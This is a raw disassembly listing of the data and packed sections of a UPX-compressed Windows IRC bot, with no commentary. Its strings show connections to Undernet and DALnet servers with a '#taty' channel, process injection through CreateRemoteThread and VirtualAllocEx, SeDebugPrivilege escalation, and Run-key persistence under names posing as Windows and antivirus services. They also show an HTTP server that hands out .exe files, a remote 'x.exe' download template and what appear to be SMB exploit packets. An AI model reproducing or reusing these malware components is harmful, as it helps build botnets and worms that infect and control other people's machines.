dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h dword_315059D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D89+EA�o
align 4
aUterm13i db 'uterm13i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D28�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025D1+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D13�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D89+F1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D89+E3�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D89+DC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D89+CF�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D89+BD�o
aU13i db 'u13i',0 ; DATA XREF: sub_31501D89+B1�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D89+A5�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D89+99�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D89+8D�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D89+81�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D89+75�o
align 10h
aU8 db 'u8',0 ; DATA XREF: sub_31501D89+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D89+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D89+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D89+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D89+3B�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D89+22�o
align 4
asc_31505B7C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F46+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F46+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502252+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501B9B+23�o
; sub_31502523+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501B9B+1C�o
; sub_315025D1+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_3150269D+57�o
; sub_3150269D+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3150269D+32�o
aClient db 'Client',0 ; DATA XREF: sub_3150269D+BC�o
; sub_3150269D+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_3150269D+37�o
; sub_3150269D+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502523+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502523+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502523+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502523+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502523+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502523+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502523+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502523+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502523+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502523+F�o
align 10h
asc_31505CE0: ; DATA XREF: sub_315025D1+56�o
; sub_315035E3+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_3150269D+B7�o
unicode 0, <1>,0
dword_31505CE8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150281A+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502801+3�o
align 4
off_31505E04 dd offset dword_31505FF0 ; DATA XREF: UPX0:315034A3�r
; UPX0:315034F5�r
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E48�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E40�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E3C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E38�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E28�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E24�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E14�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E10�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E0C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E08�o
dword_31505FF0 dd 63736F6Dh, 612D776Fh, 6B6F7664h, 722E7461h
; DATA XREF: UPX0:off_31505E04�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31506000 dd 75h aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502C92+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502C92+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DC7+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+D9�o
; sub_31502DC7+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_31503009+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_31503009+C�o
; sub_3150308C:loc_3150312E�o
align 4
a451 db '451',0 ; DATA XREF: sub_3150308C+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_3150308C+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_3150315E+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032D5+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:31503545�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:3150343B�o
align 4
a_: ; DATA XREF: UPX0:31503430�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_315035E3+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_315036FD+2E8�o
align 4
aQ: ; DATA XREF: sub_315036FD+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_315036FD+29D�o
align 10h
aI: ; DATA XREF: sub_315036FD+253�o
unicode 0, <i>,0
asc_31506114: ; DATA XREF: sub_315036FD+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_315036FD+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_315036FD+78�o
align 4
dd 9 dup(0)
dword_31506148 dd 0 ; sub_31501B9B+80�w
dword_3150614C dd 0 ; sub_315036FD+297�r
dword_31506150 dd 0 ; sub_31501A62:loc_31501B10�r ...
dword_31506154 dd 68h ; UPX0:31501D33�w ...
dword_31506158 dd 0 ; sub_31501D89+33�w
dword_3150615C dd 8 dup(0) dword_3150617C dd 0 ; sub_31502252+20�r
dword_31506180 dd 31500000h ; UPX0:31501D18�w
dword_31506184 dd 0 ; sub_3150218B+53�o ...
dword_31506188 dd 0 ; UPX0:31502301�w ...
word_3150618C dw 0 ; DATA XREF: sub_3150209F+3B�r
; sub_31502103:loc_31502164�r ...
align 10h
dword_31506190 dd 0 ; sub_3150269D+110�w ...
dword_31506194 dd 0 ; UPX0:3150352E�w ...
dword_31506198 dd 0 ; sub_315036FD+E8�r ...
dword_3150619C dd 8 dup(0) ; sub_315036FD+A�o
dword_315061BC dd 391h dup(0) dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 49010041h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 65724301h
dd 45657461h, 746E6576h, 57010041h, 46746961h, 6953726Fh
dd 656C676Eh, 656A624Fh, 1007463h, 656C6544h, 69466574h
dd 41656Ch, 74654701h, 7473614Ch, 6F727245h, 6C010072h
dd 6C727473h, 416E65h, 656C5301h, 1007065h, 7274736Ch
dd 6E797063h, 47010041h, 75437465h, 6E657272h, 6F725074h
dd 73736563h, 65470100h, 6F725074h, 64644163h, 73736572h
dd 6F4C0100h, 694C6461h, 72617262h, 1004179h, 74697257h
dd 6F725065h, 73736563h, 6F6D654Dh, 1007972h, 736F6C43h
dd 6E614865h, 656C64h, 65704F01h, 6F72506Eh, 73736563h
dd 65470100h, 646F4D74h, 48656C75h, 6C646E61h, 1004165h
dd 54746547h, 436B6369h, 746E756Fh, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 61657243h, 68546574h, 64616572h
dd 72430100h, 65746165h, 636F7250h, 41737365h, 65530100h
dd 65764574h, 100746Eh, 6E65704Fh, 6E657645h, 1004174h
dd 74697845h, 65726854h, 1006461h, 64616552h, 656C6946h
dd 65470100h, 6C694674h, 7A695365h, 43010065h, 74616572h
dd 6C694665h, 1004165h, 74697845h, 636F7250h, 737365h
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3167Eh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D0Bh, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B48h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3310h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11BDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3D84h, 652Ch, 0E18BF100h, 76406F8Bh
dd 1C47CCC3h, 46C64646h, 0C140518h, 46473E08h, 0FC000446h
dd 74108410h, 7DFCF9F0h, 1078107Ch, 0E9C0C8B8h, 0D6ACDDF6h
dd 0CF10B6Eh, 20B8AB1Dh, 0BEEB163Bh, 36CC4C5Bh, 0E8EC1993h
dd 6C07012Ah, 0F8A61425h, 83700737h, 103961Ch, 8B9E4B10h
dd 0BB6BA121h, 64DE5753h, 401FF92Bh, 1F6BB057h, 0C208A2h
dd 746858EBh, 0FFDDFFECh, 2F3A7074h, 3732312Fh, 3101302Eh
dd 3030383Ah, 652E652Fh, 0DF6578h, 8FFEDFFFh, 697A6F4Dh
dd 2F616C6Ch, 5DDF2734h, 0B966C933h, 758D01EFh, 0FFFD8B05h
dd 8AFEFB6Dh, 7993C06h, 302C0646h, 88993446h, 0EDE24707h
dd 0DAE80AEBh, 2FFDFFBh, 65622E1Ah, 93712E67h, 1201C999h
dd 0FD91BDFDh, 0BFDD0716h, 72C17FFFh, 0FD42AA68h, 10FDAA66h
dd 0A91C14BAh, 0F3C91A98h, 8608F198h, 6EC7FECFh, 10C37102h
dd 37CB5F90h, 1C965992h, 0E4143A78h, 0EC3E4FB6h, 0A7D7157h
dd 0F345713Ah, 8904F19Dh, 0FBEE748Fh, 9C04F109h, 67B24011h
dd 0B7BFE3F3h, 10F0F63Bh, 0B20BDF1Ch, 0C99B6059h, 14D90125h
dd 0D8F63E59h, 0CA17A004h, 8D2B9171h, 0AC916168h, 1FD9F6B7h
dd 9666611Ah, 0B228111Dh, 9900C850h, 0F6EFDC14h, 5557B6CFh
dd 0A44E1224h, 491291C0h, 54F7ED99h, 6FF67EEEh, 3AC41400h
dd 3A71CBCAh, 0E424FF1Ch, 0CDCF1A21h, 0D9B64FCDh, 2C668FC3h
dd 0FB113F81h, 0DB37CEB0h, 0C383B8FDh, 0A85D12CDh, 251DCBC9h
dd 3FB264ACh, 5A0A24D9h, 0C096A648h, 0D9FB1A14h, 294CFF65h
dd 9CF3EBA7h, 3416E8BAh, 0F57126F4h, 0ECFFFBBDh, 3BF90EFFh
dd 4629EF13h, 0DE5F376Bh, 0A8EC4766h, 0FF21F0AAh, 1179BFFh
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0BFEDC999h, 0F5590B7Ch
dd 0F2E9FCFCh, 0FCF7EBFCh, 0D7ABAAF5h, 0FFFF2FFBh, 0AAF934C7h
dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h
dd 85F76130h, 3519BF3Fh, 95DA1451h, 2A91720Ah, 0DBECC871h
dd 0D207FFFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah
dd 474A9A8Bh, 0DFFFFD58h, 0AB9E59FEh, 0A319DB9Bh, 0A26CEC20h
dd 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 0BBDC812h, 1FBFFFCDh
dd 0EB8D2E96h, 9A85D812h, 99D125Ah, 0F8105A9Ah, 0BB6FD397h
dd 492309FFh, 0FEFD7F66h, 5AA98712h, 850295C2h, 51238212h
dd 91046EDBh, 0CFF7CB5Ah, 242E857Bh, 53FFF9BAh, 1872424Dh
dd 0FEA5C853h, 0C7FFFFF8h, 2006206h, 4E204350h, 4F575445h
dd 50204B52h, 52474F52h, 31204D41h, 0D6FB58FFh, 414C17CDh
dd 0A024D4Eh, 646E6957h, 9673776Fh, 20FDBFB6h, 20726F66h
dd 676B0357h, 70756F72h, 611A330Eh, 0EB74B61Fh, 32234D27h
dd 32322158h, 59312E32h, 4E2F6D33h, 20182054h, 6A8B163Ch
dd 0A4CF2325h, 0B06C0773h, 0C2A176Fh, 40023FFh, 20140A11h
dd 376B7D05h, 69EFD46Ah, 534B4C00h, 0DB005053h, 76177923h
dd 0E0088297h, 6E240057h, 0FF736C5Eh, 6F006400h, 73007700h
dd 130743Ah, 0C896DC09h, 398CDEh, 2E1D2335h, 6C89CF07h
dd 0ABDA00C0h, 93DA2008h, 5720324Ch, 0B06C039Fh, 14650EDh
dd 7472346h, 1901E46Eh, 6000640h, 0BFFF0110h, 151F7FFCh
dd 48E0888Ah, 44004F00h, 7A6A1981h, 1C49E4F2h, 2530AF28h
dd 89BE474h, 536710ECh, 75DF5CE1h, 29E5B5CDh, 5C040030h
dd 915ABD07h, 875EEBBh, 2E4D615Ch, 38003607h, 0B1BB6F75h
dd 1B30772Eh, 43EC0049h, 3F3B2400h, 0EC39E403h, 0A2646300h
dd 0E5B7FC83h, 4004DC08h, 0DE00FF16h, 0E00DEh, 4C269F16h
dd 201D848h, 1B284026h, 19FDF70Dh, 6C8B1103h, 70D374D9h
dd 0D977C852h, 9C2A6300h, 0B03B256Bh, 109FDB67h, 1B04480Eh
dd 0DB9F1354h, 5A54AEBAh, 22596326h, 45CBC75Ch, 73FE6907h
dd 58765h, 4810030Bh, 93FF10B8h, 25016AA6h, 19286A01h
dd 0D0B10C39h, 63FF0B11h, 0A89BFFh, 2ED94FC0h, 885D5FF5h
dd 0C91CEB8Ah, 3CE89F11h, 0BD91732Bh, 604810ECh, 0A3F40CD1h
dd 0AF21E460h, 0A00CA0E4h, 0DF0CB10Ch, 191C9h, 40880CA0h
dd 0C93C2300h, 0EC0009F7h, 95000703h, 7C4F4014h, 0D836452Fh
dd 0BF4070h, 0FE134307h, 78136447h, 0AB001385h, 13E9A65Bh
dd 0CF204E78h, 0FF2FF810h, 6180EFEh, 4023C6ABh, 7C840856h
dd 883A4FBAh, 0EE10B943h, 10B801FFh, 9E4F26CCh, 0DAD200Ch
dd 42BCB307h, 0D80F7F3Eh, 0F2700118h, 84E4AF21h, 950F840Fh
dd 93C9000Fh, 7F0200DFh, 0F6C0F84h, 0B0F0955Bh, 6FA89A00h
dd 11812743h, 691F13D9h, 5814DB6Eh, 205058F9h, 46007250h
dd 89F90144h, 32396790h, 15123C6Bh, 81AF0275h, 53412790h
dd 0FF941C00h, 1644395h, 5CC606EBh, 5C73255Ch, 0F37FFF2Fh
dd 24637069h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 0F64C6976h, 656CF3FFh, 64416567h, 7473756Ah, 656B6F54h
dd 0EE73176Eh, 4CDB724Fh, 7075126Fh, 756C6156h, 0FF174165h
dd 4FDFB6C5h, 636F2870h, 43347324h, 61766461h, 0FF3F4670h
dd 323369EFh, 6574750Bh, 33316D72h, 65685369h, 2577B715h
dd 72545FFEh, 39577961h, 6572430Fh, 65521E61h, 0DBB9DF6Dh
dd 54056F6Dh, 56140C68h, 75747269h, 0E567415Ch, 5328ADDBh
dd 6B357845h, 4B6E7265h, 0F46897F5h, 4822F3A5h, 83505454h
dd 0DA322040h, 5B12FDEFh, 0D4B4F20h, 6F4B010Ah, 0D9B2446Eh
dd 2D02DDBFh, 7467044Ch, 25203A68h, 0B72F1875h, 28961ED6h
dd 26B97954h, 7E6C70A7h, 69DB6F47h, 15698563h, 0CB2D782Fh
dd 6D6F632Dh, 3D4F7270h, 65CDED8Ah, 0DF5764h, 85BDD247h
dd 5445F2h, 11640266h, 165673D7h, 6D95BFDAh, 0B1637673h
dd 0DC0177D7h, 65DA2DDFh, 5F320F08h, 34317517h, 0CE9A6903h
dd 307F7CDh, 60303132h, 396ECF27h, 7800381Fh, 6E7B0732h
dd 3031C832h, 0D588083Fh, 20EDFDFDh, 455355ABh, 8444952h
dd 658494Eh, 85ED6700h, 3AD89120h, 97BD6425h, 0CBDB1653h
dd 54464FFFh, 45524157h, 6F694D5Ch, 5CB36F73h, 0DD6DDCA7h
dd 75435C0Fh, 56F97272h, 5CEE73B8h, 2B5A7552h, 53AC3E14h
dd 5280ED79h, 77FF21D7h, 64478A18h, 68736166h, 73647A6Eh
dd 612D6C64h, 4953376Dh, 573F6177h, 0A15CD0Eh, 7B296C86h
dd 0DF235742h, 9C6B44B0h, 6120E503h, 20676966h, 0E86EF676h
dd 760BF570h, 32657628h, 64B1649Dh, 53207B9Bh, 1B654410h
dd 1B2373B8h, 17234C42h, 0C3F1B19Bh, 3CAB25h, 1A202F42h
dd 8FA35AC9h, 44BF232Dh, 0D42B01E9h, 44378206h, 0EC667369h
dd 0DE46DBB9h, 6D672F66h, 6B632A9Ch, 2496C2FFh, 74690A63h
dd 614D2079h, 691A1E6Eh, 0B9158D76h, 206FF31h, 0A2CE8D24h
dd 4153527Ch, 0B3EFAC31h, 0FFFFFFF6h, 499F8EA4h, 0DB1F45DDh
dd 0E5B5C564h, 0CBE2AA0Dh, 63992223h, 18481C63h, 9AC3F273h
dd 0FFFFFC8Ch, 4D8556FFh, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 0FFF4E3EFh, 479E1BFFh
dd 84DFBDD8h, 80371EBAh, 0F58B8173h, 0E07D4A0Dh, 0C52DFE92h
dd 6FFFFFFFh, 0E020C6AAh, 68BD9C85h, 0B6296A50h, 0C3348250h
